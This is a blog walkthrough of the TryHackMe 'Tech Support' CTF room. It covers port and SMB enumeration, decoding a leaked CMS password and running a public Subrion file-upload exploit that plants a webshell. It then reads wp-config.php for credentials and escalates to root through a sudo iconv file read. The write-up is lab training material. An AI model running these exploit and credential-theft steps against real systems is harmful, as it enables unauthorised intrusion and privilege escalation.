Tech Support TryHackMe Walkthrough

Madhav Mehndiratta -

Challenge Link - https://tryhackme.com/room/techsupp0rt1

Initial Enumeration and Web Shell

We can start the initial enumeration by running a port scan using nmap to scan open ports and default scripts.

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ nmap -sC -sV -oN nmap/initial 10.10.59.1
Nmap scan report for 10.10.59.1
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2022-05-16T17:28:34
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-05-21T22:58:36+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m29s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May  16 22:58:43 2022 -- 1 IP address (1 host up) scanned in 47.35 seconds

We have a SSH server running on port 22, Apache httpd server running on port 80 and Samba smbd running on port 139 and 445.

Let's start by enumerating the port 80 first.  Nmap scan shows that it is running the Apache2 Ubuntu Default Page. Let's open our web browser and check it out.

Next, we can run a gobuster scan to look for hidden files and directories. 

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ gobuster dir -u http://10.10.59.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.59.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 312] [--> http://10.10.59.1/wordpress/]
/test                 (Status: 301) [Size: 307] [--> http://10.10.59.1/test/]
===============================================================
Finished
===============================================================

We got two directories, I enumerated both of them but there is nothing useful for us. This is a rabbit hole, just don't fall for this.

Next we can enumerate the SMB server and check if there is any share that we can read or write.

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient -L 10.10.59.1
Password for [WORKGROUP\madhav]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        websvr          Disk      
        IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP

We got a share named websvr. Let's try connecting to it.

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient //10.10.59.1/websvr
Password for [WORKGROUP\madhav]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 29 12:47:38 2021
  ..                                  D        0  Sat May 29 12:33:47 2021
  enter.txt                           N      273  Sat May 29 12:47:38 2021

                8460484 blocks of size 1024. 5698836 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit

We got a file named enter.txt.  Inside the file, there are some credentials (which are encoded) and reference to a directory named /subrion.

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ cat enter.txt     
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

First of all, we need to decrypt the password. For this we can use CyberChef. This is a very easy encryption, it can be directly solved using CyberChef's magic function.

We got the password! If you try to access the /subrion directory, the page does not load properly. But we can access the /subrion/panel directory. This contains a login page, and we can login using the credentials we got earlier.



For those who don't know about subrion, it is an open source CMS based on PHP and MySQL. There are many exploits available publicly for this CMS including the exploit for Authenticated File Upload vulnerability.

We can use this exploit to get a reverse shell on the target machine.

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ python3 49876.py -u http://10.10.59.1/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422

[+] Trying to connect to: http://10.10.59.1/subrion/panel/
[+] Success!
[+] Got CSRF token: maQYr48N6TYYj96VUyXQnHJLa10YDXfBBE7C66Tk
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: gbbogvvwtgreihg 

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.59.1/subrion/panel/uploads/gbbogvvwtgreihg.phar 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

You can also get this reverse shell manually, by uploading a php-reverse-shell with a .phar extension to /subrion/panel/uploads and then you can execute the reverse shell.

Privilege Escalation

Now we have an initial shell on the target machine. Our next task is to elevate our privileges and finally get a root shell on the machine. To escalate our privileges, I started enumerating the web directories, and I found a password in the wp-config.php.

$ cat /var/www/html/wordpress/wp-config.php

We can use this password to login as user scamsite (can be found from /etc/passwd) using SSH.

┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ ssh scamsite@10.10.59.1           
The authenticity of host '10.10.59.1 (10.10.59.1)' can't be established.
ED25519 key fingerprint is SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.59.1' (ED25519) to the list of known hosts.
scamsite@10.10.59.1's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


120 packages can be updated.
88 updates are security updates.


Last login: Fri May 28 23:30:20 2021
scamsite@TechSupport:~$

Now, if we run the sudo -l command, we can see that the user scamsite can run the /usr/bin/iconv command as user root. 

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

iconv is a tool in linux which can be used to convert text from one encoding to another. You can read more about this tool from the linux man page. For GTFOBins, I found out that we can exploit the special permission given to this tool to read our root flag.

We can do this by the following command:

camsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt"
****************************************  -

The challenge is now complete. We managed to read the root flag! That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Alfrey Davilla | vaneltia.